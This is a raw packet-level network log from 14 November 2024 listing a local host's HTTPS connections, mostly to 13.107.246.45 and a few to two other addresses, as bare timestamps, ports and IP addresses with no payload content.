                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.006433964 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.007216930 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.007282972 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.008124113 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.008174896 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.145486116 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.145541906 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.145740032 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.145925999 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.145925999 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.145975113 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.146003962 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.149315119 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.149391890 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.149475098 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.149703979 CET49810443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.149735928 CET4434981013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.152934074 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.153398991 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.153409958 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.153871059 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.153877020 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.179764986 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.180320978 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.180335045 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:38.181240082 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.111607075 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.123425961 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.123954058 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.123984098 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.124492884 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.124499083 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.172597885 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.172765970 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173067093 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173206091 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173206091 CET49811443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173261881 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.173290968 CET4434981113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177031040 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177134991 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177223921 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177403927 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.177432060 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241194963 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241261959 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241628885 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241668940 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241668940 CET49813443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241697073 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.241710901 CET4434981313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.245620012 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.245676041 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.246058941 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.246257067 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.246267080 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261121035 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261190891 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261307001 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261424065 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261424065 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261604071 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261629105 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261645079 CET49812443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.261651993 CET4434981213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266283035 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266374111 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266468048 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266753912 CET49818443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.266789913 CET4434981813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.487580061 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514133930 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514183998 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514626026 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.514632940 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645591021 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645687103 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645739079 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645742893 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.645896912 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646209955 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646234035 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646250010 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.646256924 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650238991 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650286913 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650460958 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650732994 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.650753021 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.922830105 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923408985 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923491001 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923954010 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:39.923966885 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.878077030 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.878104925 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.886790991 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.886810064 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.939040899 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.939126968 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.939179897 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.942987919 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.943001986 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.943027973 CET49820443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.943032980 CET4434982013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.946975946 CET49825443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947079897 CET4434982513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947184086 CET49825443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947329998 CET49825443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.947351933 CET4434982513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.985224962 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.985766888 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.985776901 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.986363888 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:40.986367941 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044038057 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044245958 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044316053 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044626951 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044640064 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044650078 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.044653893 CET4434982113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.047261000 CET49826443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.047319889 CET4434982613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.047405958 CET49826443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.048310041 CET49826443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.048333883 CET4434982613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.118067980 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.118571043 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.118587017 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.119056940 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.119061947 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148257971 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148287058 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148334026 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148344994 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148391962 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148610115 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148624897 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148633957 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.148638010 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.166268110 CET49827443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.166358948 CET4434982713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.166513920 CET49827443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.167829037 CET49827443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.167869091 CET4434982713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.228246927 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.232619047 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.232656956 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.233184099 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.233195066 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.247852087 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.247934103 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.247997046 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.250030994 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.250045061 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.250106096 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.250111103 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.255105972 CET49828443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.255166054 CET4434982813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.255250931 CET49828443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.255711079 CET49828443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.162126064 CET49828443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.162132978 CET4434982813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.165853024 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.165899992 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.165957928 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.166321039 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.166335106 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.209398031 CET49829443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.209419012 CET44349829149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.209682941 CET44349829149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.209745884 CET49829443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.213143110 CET49829443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.247528076 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.247961044 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.248128891 CET49830443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.254200935 CET49830443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.254200935 CET49830443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.254250050 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.254280090 CET4434983013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.255343914 CET44349829149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.261766911 CET49835443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.261894941 CET4434983513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.262006998 CET49835443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.262371063 CET49835443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.262430906 CET4434983513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.532042980 CET44349829149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.532068014 CET44349829149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.532115936 CET44349829149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.532149076 CET49829443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.532193899 CET49829443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.534826040 CET49829443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.534847021 CET44349829149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.584877014 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.588289976 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.588320971 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.588733912 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.588740110 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.624680042 CET49836443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.624743938 CET44349836116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.624823093 CET49836443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.625097990 CET49836443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.625109911 CET44349836116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.693597078 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.696357012 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.696434975 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.696839094 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.696852922 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.713495016 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.713731050 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.713793039 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.713816881 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.713855028 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.716803074 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.716835022 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.716864109 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.716870070 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.733532906 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.733568907 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.733669043 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.770761967 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.770790100 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.806838989 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.827224016 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.827584982 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.827737093 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.846860886 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.846926928 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.850217104 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.744144917 CET49836443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.744440079 CET49836443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.748681068 CET4434983913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.749094963 CET49839443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.749116898 CET4434983913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.749695063 CET49839443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.749700069 CET4434983913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.791335106 CET44349836116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.800981998 CET4434984013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.801347971 CET49840443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.801371098 CET4434984013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.801686049 CET49840443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:43.801695108 CET4434984013.107.246.45192.168.2.5
